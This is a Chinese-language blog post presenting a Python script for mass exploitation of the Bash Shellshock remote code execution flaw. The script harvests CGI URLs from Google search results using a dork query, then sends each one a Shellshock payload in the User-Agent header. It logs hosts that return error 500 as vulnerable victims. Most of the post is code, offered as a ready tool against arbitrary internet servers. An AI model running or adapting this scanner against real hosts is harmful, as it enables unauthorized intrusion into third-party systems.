Bash Shellshock(Bash遠程代碼執行)漏洞批量利用腳本

Bash遠程代碼執行漏洞的威力確實要比心臟滴血大很多，但是影響範圍不是很廣泛，不過昨天的分析文章Bash遠程代碼執行漏洞分析中末尾提到了這個漏洞的批量問題。
其中最最簡單的方法就是使用搜索引擎的hacking技術，這裏我使用的Google Hacking語法結合Google API來進行鏈接的抓取。只不過在國內的話。。。。需要加代理。
程序中的代理是我本地的goagent代理，端口是8087。如何檢測漏洞思路也很簡單，我這裏直接根據服務器返回碼進行判斷的。

思路就是以上這些，下面還是和往常一樣，貼代碼：

 

#coding=utf-8
import requests
import json
import sys
import threading
import socket
vul_res = []
class GoogleURLProvider():
	def __init__(self,pageCount,proxies):
		self.pageCount = pageCount #查詢的頁數
		self.keywords = r'inurl:cgi-bin filetype:sh'
		self.apiurl = "https://ajax.googleapis.com/ajax/services/search/web"
		self.proxies = proxies
	def getRequest(self,url):
		return requests.get(url,proxies=self.proxies,verify=False)

	def getUrls(self):
		ret_list = []
		tmp_list = []
		for x in xrange(0,self.pageCount):
			url = "{apiurl}?v=1.0&q={keywords}&rsz=8&start={pageCount}".format(apiurl=self.apiurl,keywords=self.keywords,pageCount=x)
			try:
				r = self.getRequest(url)	
				results = json.loads(r.text)
				if not results:
					continue
				infos = results['responseData']['results']
				if infos:
					for i in infos:
						tmp_list.append(i['url'])
			except Exception, e:
				continue
		ret_list = ret_list + tmp_list
		return ret_list

class BashRCEDetector():
	def __init__(self,urls):

		self.urls = urls
	def detector(self):
		global vul_res
		
		for x in self.urls:
			#多線程執行
			each = EachWorker(x)
			each.start()
			each.join()


'''線程工作類'''
class EachWorker(threading.Thread):
	def __init__(self,url):
		threading.Thread.__init__(self)
		self.url = url
	def run(self):
		global vul_res
		useragent_header = {
			'User-Agent':'''() { 1;}; echo 'eee'''
		}
		try:
			r = requests.get(self.url,headers = useragent_header,timeout=8)
			if r.status_code == 500:
				print "{url} has Bash RCE vulnerability".format(url=self.url)
				vul_res.append(self.url)
			else:
				pass
		except socket.timeout, e:
			pass
		except requests.exceptions.Timeout, e:
			pass
		except requests.exceptions.ConnectionError, e:
			pass


if __name__ == '__main__':
	print 'Powered by:Exploit QQ:739858341'
	print 'This is a program which you can use to scan the BashRCE vulnerability\nScanner working,please wait....'
	if len(sys.argv) != 2:
		print 'Usage:python BashRCEScanner <google pageCount>'
		sys.exit()
	#goagent proxy
	#在這裏修改，加入你自己的代理即可使用
	proxies = {
	'http':"http://127.0.0.1:8087",
	'https':"http://127.0.0.1:8087"
	}
	url_res = []
	vul_guys = []
	urlgetter = GoogleURLProvider(int(sys.argv[1]),proxies)
	url_res = urlgetter.getUrls()

	bash_detector = BashRCEDetector(url_res)
	bash_detector.detector()
	if len(vul_res) == 0:
		print 'This group have no vulnerability'
	else:
		print 'Find %d poor host(s)' % len(vul_res) 

 

 

 

 

 

運行截圖：

 

 

瞭解本專欄 訂閱專欄 解鎖全文